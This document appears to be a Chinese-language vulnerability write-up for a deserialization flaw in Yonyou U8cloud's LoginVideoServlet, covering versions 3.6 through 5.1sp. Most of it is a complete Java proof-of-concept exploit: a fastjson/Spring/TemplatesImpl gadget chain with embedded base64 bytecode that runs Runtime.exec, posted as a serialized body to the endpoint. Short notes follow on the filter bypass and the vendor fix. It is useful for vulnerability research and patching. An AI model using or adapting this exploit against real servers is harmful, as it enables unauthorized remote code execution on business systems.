用友U8cloud-LoginVideoServlet接口反序列化

影响版本

3.6 3.6sp 5.0 5.0sp 5.1 5.1sp

poc

import com.alibaba.fastjson.JSONArray;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xpath.internal.objects.XString;
import org.springframework.aop.target.HotSwappableTargetSource;

import java.awt.*;
import java.io.*;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.*;
import java.util.List;

public class FastJ {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
//        byte[] bytes = Files.readAllBytes(Paths.get("D:/1tmp/classes/CalcAbs.class"));
        // 弹出计算器
        String calc = "yv66vgAAADQANAoABwAlCgAmACcIACgKACYAKQcAKgoABQAlBwArAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAlMQ2FsY0FiczsBAApFeGNlcHRpb25zBwAsAQAJdHJhbnNmb3JtAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7BwAtAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAAXQHAC4BAApTb3VyY2VGaWxlAQAMQ2FsY0Ficy5qYXZhDAAIAAkHAC8MADAAMQEABGNhbGMMADIAMwEAB0NhbGNBYnMBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9pby9JT0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAHAAAAAAAEAAEACAAJAAIACgAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgALAAAADgADAAAACgAEAAsADQAMAAwAAAAMAAEAAAAOAA0ADgAAAA8AAAAEAAEAEAABABEAEgABAAoAAABJAAAABAAAAAGxAAAAAgALAAAABgABAAAADwAMAAAAKgAEAAAAAQANAA4AAAAAAAEAEwAUAAEAAAABABUAFgACAAAAAQAXABgAAwABABEAGQACAAoAAAA/AAAAAwAAAAGxAAAAAgALAAAABgABAAAAEgAMAAAAIAADAAAAAQANAA4AAAAAAAEAEwAUAAEAAAABABoAGwACAA8AAAAEAAEAHAAJAB0AHgACAAoAAABBAAIAAgAAAAm7AAVZtwAGTLEAAAACAAsAAAAKAAIAAAAUAAgAFQAMAAAAFgACAAAACQAfACAAAAAIAAEAIQAOAAEADwAAAAQAAQAiAAEAIwAAAAIAJA==";
        byte[] bytes = Base64.getDecoder().decode(calc);
        setFieldValue(templates, "_bytecodes", new byte[][]{bytes});
        setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
        setFieldValue(templates, "_name", null);
        setFieldValue(templates, "_class", null);



        JSONArray toStringClass = new JSONArray();
        toStringClass.add(templates);

        HotSwappableTargetSource hotSwappableTargetSource1 = new HotSwappableTargetSource(toStringClass);
        HotSwappableTargetSource hotSwappableTargetSource2 = new HotSwappableTargetSource(new XString("1"));
        HashMap hashMap = makeMap(hotSwappableTargetSource1, hotSwappableTargetSource2);

        HashMap<Object, Object> hashMap1 = new HashMap<>();
        hashMap1.put(templates, hashMap);

        setFieldValue(templates, "_name", "1diot9");

        byte[] ser = ser(hashMap1);
        Requests.post("http://127.0.0.1/service/LoginVideoServlet", ser);
    }

    public static void setFieldValue(Object obj, String fieldName, Object value) {
        Class<?> aClass = obj.getClass();
        try{
            Field field = aClass.getDeclaredField(fieldName);
            field.setAccessible(true);
            field.set(obj, value);
        } catch (NoSuchFieldException e) {
            aClass = aClass.getSuperclass();
        } catch (IllegalAccessException e) {
            throw new RuntimeException(e);
        }
    }

    public static void deser(byte[] bytes) throws IOException, ClassNotFoundException {
        ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
        ObjectInputStream ois = new ObjectInputStream(bais);
        ois.readObject();
    }

    public static byte[] ser(Object obj) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(obj);
        oos.close();
        byte[] bytes = baos.toByteArray();
        Files.write(Paths.get("./fastj.bin"), bytes);
        return bytes;
    }

    public static HashMap<Object, Object> makeMap (Object v1, Object v2 )
            throws Exception {
        HashMap<Object, Object> s = new HashMap<>();
        setFieldValue(s, "size", 2);
        Class<?> nodeC;
        try {
            nodeC = Class.forName("java.util.HashMap$Node");
        } catch (ClassNotFoundException e) {
            nodeC = Class.forName("java.util.HashMap$Entry");
        }
        Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class,
                Object.class, Object.class, nodeC);
        nodeCons.setAccessible(true);
        Object tbl = Array.newInstance(nodeC, 2);
        Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));
        Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));
        setFieldValue(s, "table", tbl);
        return s;
    }
}
import java.io.*;
import java.net.HttpURLConnection;
import java.net.URL;

public class Requests {

    public static void post(String host, byte[] data) throws Exception {
        // 目标 URL
        URL url = new URL(host);
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();

        // 配置请求
        conn.setRequestMethod("POST");
        conn.setDoOutput(true);
        conn.setRequestProperty("Content-Type", "application/octet-stream");

        // 从 ser1.bin 读取序列化数据

//        File file = new File("./ser1.bin");
//        byte[] data = new byte[(int) file.length()];
//        FileInputStream fis = new FileInputStream(file);
//        fis.read(data);

        // 写入请求体
        try (OutputStream os = conn.getOutputStream()) {
            os.write(data);
            os.flush();
        }

        // 读取响应
        try (InputStream is = conn.getInputStream();
             BufferedReader br = new BufferedReader(new InputStreamReader(is))) {
            String line;
            while ((line = br.readLine()) != null) {
                System.out.println(line);
            }
        }

        conn.disconnect();
    }
}

漏洞原理

很直接的反序列化，只不过要绕一下黑名单和白名单

漏洞分析

通过everything查找，找到对应的路由：

或者用之前调试时得到的映射关系，不知道的话去看我之前的文章

用友U8Cloud环境搭建 | 1diot9’s Blog

漏洞点就是readObject：

但是需要着重关注一下上面的FilteredObjectInputStream：

这里把HashMap作为了白名单，所以反序列化链必须以HashMap开头。

但是这还不够，如果你直接用cc6打，会在cmd的日志里发现REJECT。

这是因为还有黑名单过滤：

黑名单通过配置文件加载：

没打补丁前的黑名单并不多。

能发现有fastjson1.2.83依赖和spring依赖。所以这里选择：

HashMap.readObject–>HotSwappableTargetSource.equals–>XString.equals–>JSONArray.toString–>getter–>TemplatesImpl

fastjson利用时也需要绕一下黑名单，可以参考：

FastJson与原生反序列化(二)

漏洞修复

新增resolveClass，只允许反序列化HashMap和String，而不是只检查最外层是不是HashMap